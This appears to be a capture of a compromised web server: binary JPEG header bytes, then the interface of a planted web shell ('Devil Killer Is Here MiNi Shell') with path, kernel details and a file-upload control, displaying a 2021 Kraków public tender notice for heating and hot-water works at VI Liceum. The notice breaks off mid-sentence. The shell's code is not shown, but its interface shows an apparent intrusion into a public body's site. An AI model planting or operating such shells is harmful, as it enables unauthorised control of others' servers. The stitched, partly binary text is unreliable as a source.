JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210531/0006984601-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00069846 z dnia 2021-05-31</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa inst. centralnego ogrzewania, inst. ciepłej wody użytkowej oraz inst. ciepła technologicznego na potrzeby budynku VI Liceum Ogólnokształcącego w Krakowie, ul. Wąska 5-7, 31-057 Kraków </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Klimat-Energia-Gospodarka Wodna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 384368691</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">os. Złotej Jesieni 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-828</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 126167588</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@kegw.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kegw.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa inst. centralnego ogrzewania, inst. ciepłej wody użytkowej oraz inst. ciepła technologicznego na potrzeby budynku VI Liceum Ogólnokształcącego w Krakowie, ul. Wąska 5-7, 31-057 Kraków </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ed18547d-c232-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00069846</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001109/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Wykonanie prac budowlanych i instalacyjnych - budynek VI liceum ogólnokształcącego</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://www.kegw.krakow.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/;<br/>https://epuap.gov.pl/wps/portal; <br/>email: zamowienia@kegw.krakow.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. 2. Maksymalny<br/>rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: złożenia, zmiany,<br/>wycofania oferty lub wniosku oraz do komunikacji wynosi 150 MB. 3. Za datę przekazania oferty,<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.4.<br/>Identyfikator postępowania (ID) dla niniejszego postępowania o udzielenie zamówienia dostępny jest<br/>na Liście wszystkich postępowań na miniPortalu.5. Zamawiający dopuszcza przesyłanie danych w<br/>formatach dopuszczonych odpowiednimi przepisami prawa, tj. m.in.: .pdf, .doc, .docx, .rtf, .xps,<br/>.odt.,przy czym zaleca się wykorzystywanie plików w formacie .pdf.6. Sposób sporządzania oraz<br/>sposób przekazywania ofert, oświadczeń, podmiotowych i przedmiotowych środków dowodowych oraz<br/>innychinformacji, oświadczeń lub dokumentów przekazywanych w postępowaniu o udzielenie<br/>zamówienia publicznego; wymagania techniczne dla dokumentów elektronicznych oraz wymagania<br/>techniczne i organizacyjne użycia środków komunikacji elektronicznej służące do odbioru<br/>dokumentówelektronicznych (oferta, oświadczenia, podmiotowe i przedmiotowe środki dowodowe oraz<br/>innych informacji, oświadczeń lub dokumentów przekazywanych w postępowaniu) zawiera SWZ oraz<br/>Rozporządzenie ws. komunikacji elektronicznej (Dz. U z 2020r. poz. 2452)7. Dokumenty sporządzone<br/>w języku obcym są składane wraz z tłumaczeniem na język polski. 8.Szczegółowe informacje<br/>dotyczące wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznych zawiera SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich<br/>danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z 04.05.2016, str. 1), dalej „RODO”, informuje, że:<br/>• administratorem Pani/Pana (Wykonawcy) danych osobowych jest: Klimat - Energia - Gospodarka<br/>Wodna, Os. Złotej Jesieni 14, 31-828 Kraków, tel. +48 126167588, email: sekretariat@kegw.krakow.pl<br/>• Kontakt z Inspektorem Ochrony Danych możliwy jest przez adres email: iod@kegw.krakow.pl<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego p.n.: „Przebudowa instalacji centralnego ogrzewania, instalacji ciepłej wody użytkowej oraz instalacji ciepła technologicznego na potrzeby budynku VI Liceum Ogólnokształcącego w Krakowie, ul. Wąska 5-7, 31-057 Kraków” numer sprawy: 2/V/2021.<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 74 ustawy Pzp „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• posiada Pani/Pan:<br/>- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*;<br/>- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub<br/>konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>- prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>• nie przysługuje Pani/Panu:<br/>- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>• Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO<br/>przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla<br/>przedmiotowej skargi jest Urząd Ochrony Danych Osobowych ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2/V/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest przebudowa instalacji centralnego ogrzewania, instalacji ciepłej wody użytkowej oraz instalacji ciepła technologicznego na potrzeby budynku VI Liceum Ogólnokształcącego przy ul. Wąskiej 5-7 w Krakowie.<br/>Zadanie będzie realizowane w czterech etapach w terminie do 12 tygodni od zawarcia umowy w terminach:<br/>•	Etap 1 – 4 tygodnie (1-4 tydzień realizacji umowy) <br/>•	Etap 2 – 3 tygodnie (5-7 tydzień realizacji umowy)<br/>•	Etap 3 – 4 tygodnie (8-12 tydzień realizacji umowy)<br/>•	Etap 4 – 10 tygodni (1-10 tydzień realizacji umowy)<br/>Etapy obejmują swoim zakresem:<br/>•	I etap obejmuje wykonanie całości przedmiotu umowy w prawym skrzydle budynku od ul. Józefa do klatki schodowej K2 łącznie z tą klatką schodową, z wyłączeniem kondygnacji piwnicy,<br/>•	II etap obejmuje wykonanie całości przedmiotu umowy w środkowej części budynku pomiędzy klatkami schodowymi K2 i K1 od strony ul. Wąskiej łącznie z klatką schodową K1, z wyłączeniem kondygnacji piwnicy,<br/>•	III etap to wykonanie całości przedmiotu umowy w lewym skrzydle budynku od ul. Św. Wawrzyńca do klatki schodowej K1, z wyłączeniem kondygnacji piwnicy,<br/>•	IV etap to wykonanie całości przedmiotu umowy na kondygnacji piwnicy (-1) oraz w Sali gimnastycznej.<br/>Zamawiający zastrzega sobie, że etapy I, II, III należy wykonać po kolei w całości a kolejny etap można zacząć realizować dopiero po zakończeniu i odebraniu poprzedniego. Etap IV można wykonywać niezależnie od etapów I – III.<br/>Przedmiot zamówienia nie został podzielony na części. Budynek posiada wspólną instalację grzewczą zasilaną z jednego źródła (przyłącz instalacji ciepłowniczej MPEC) i stanowi całość z technicznego punktu widzenia. Stan techniczny rurociągów z powodu obecności kamienia i innych zanieczyszczeń eksploatacyjnych, które zebrały się na przestrzeni lat, nie pozwala na połączenie go z jakąkolwiek wyremontowaną częścią instalacji, gdyż spowoduje to zanieczyszczenie nowych rurociągów. Układ instalacji obsługiwany jest przez jedną pompę obiegową i nie jest możliwe wydzielenie części instalacji, która mogłaby stanowić osobny etap prac.<br/><br/>Zamawiający opisał przedmiot zamówienia za pomocą: <br/>•	Opisu Przedmiotu Zamówienia wraz z załącznikami, zwanego dalej OPZ (załącznik nr 2 do SWZ) wraz załącznikami,<br/>•	Projektowanych Postanowień Umowy, zwanego dalej PPU (załącznik nr 3 do SWZ)<br/><br/>Zamawiający przewiduje zorganizowanie wizji lokalnej dla Wykonawców. Wizja lokalna odbędzie się w budynku VI Liceum Ogólnokształcącego w Krakowie, ul. Wąska 5-7, 31-057 Kraków w dniu 9 czerwca 2021 r. Zbiórka o godzinie 10.00 przed głównym wejściem do budynku. Chęć wzięcia udziału w wizji należy zgłosić mailowo do dnia 8 czerwca 2021 r. na adres mailowy: zamowienia@kegw.krakow.pl. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331100-7 - Instalowanie centralnego ogrzewania</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">84 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert.<br/>Cena (C) – waga kryterium: 60%,<br/>Skrócenie czasu realizacji (S) – waga kryterium: 20%, <br/>Doświadczenie kierownika budowy (D) – 20%<br/><br/>N = C + S + D<br/>gdzie: <br/>N – łączna ilość punktów badanej oferty, <br/>C – liczba punktów badanej oferty w kryterium „Cena”<br/>S – liczba punktów badanej oferty w kryterium „Skrócenie czasu realizacji”<br/>D – liczba punktów badanej oferty w kryterium „Doświadczenie kierownika budowy”</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie czasu realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kierownika budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu o udzielenie zamówienia tj.:<br/>1)	Zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza warunku w tym zakresie.<br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia wymagań w tym zakresie. <br/>3)	Sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia wymagań w tym zakresie. <br/>4)	Zdolności technicznej lub zawodowej:<br/>Wykonawca musi wykazać spełnienie warunku udziału w postępowaniu w następującym zakresie:<br/>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunki udziału w postępowaniu w zakresie posiadania zdolności technicznej lub zawodowej: <br/>a)	Posiadają wiedzę i doświadczenie tj.:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert w postepowaniu (a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie), zrealizował roboty budowlane odpowiadające swoim rodzajem przedmiotowi zamówienia to jest polegające na realizacji co najmniej jednego zadania obejmującego roboty budowlane i instalacyjne w zakresie instalacji centralnego ogrzewania i ciepłej wody użytkowej w budynku będącym pod nadzorem konserwatora zabytków, o wartości robót nie mniejszej niż 500 tys. zł (brutto)<br/>b)	dysponują osobami zdolnymi do wykonania zamówienia tj.:<br/>- dysponuje lub będzie dysponował jedną osobą pełniącą funkcję kierownika budowy, posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej oraz posiadająca kwalifikacje, o których mowa w art. 37c ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami,<br/>- dysponuje lub będzie dysponował jedną osobą pełniącą funkcję kierownika robót sanitarnych posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, oraz posiadająca kwalifikacje, o których mowa w art. 37c ustawy z dnia 23 lipca 2003r. o ochronie zabytków i opiece nad zabytkami,,<br/><br/>W/w osoby mogą posiadać odpowiadające wskazanym wyżej ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub spełniać warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2020 r. poz. 1333) tj. osób których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniającą/ymi wymogi o których mowa w art. 20a ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa („świadczenie usług transgranicznych”).<br/>Osoby na stanowiskach kierowniczych mają pozostawać zrzeszone we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tekst jednolity: Dz. U. z 2016r. poz. 1725 ),<br/>UWAGA: Zamawiający dopuszcza by jedna (ta sama osoba) skierowana przez Wykonawcę do realizacji zamówienia łączyła w sobie kwalifikacje wymagane powyżej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie o niepodleganiu wykluczeniu z udziału w postępowaniu<br/>(załącznik nr 4 do SWZ) 2. Jeżeli dotyczy: oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków<br/>udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego<br/>zasoby.3.Oświadczenia wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie<br/>konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086) z innym wykonawcą, który złożył<br/>odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego<br/>wykonawcy należącego do tej samej grupy kapitałowej – wzór oświadczenia stanowi załącznik nr 6 do<br/>SWZ. Zamawiający odstąpi od wezwania do złożenia ww. oświadczenia w sytuacji gdy w<br/>postępowaniu zostanie złożona tylko jedna oferta.4.Oświadczenia o aktualności informacji zawartych w<br/>oświadczeniu składanym na podstawie art. 125 ustawy Pzp tj. oświadczenia dot. braku podstaw<br/>wykluczenia oraz oświadczenia o spełnieniu warunków udziału w postępowaniu - wzór oświadczenia<br/>stanowi załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenie o spełnianiu warunków udziału w postępowaniu (załącznik nr 5 do SWZ).<br/><br/>2. Jeżeli dotyczy: oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu lub kryteriów selekcji, w zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>3.	Wykazu robót budowlanych wykonanych w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym 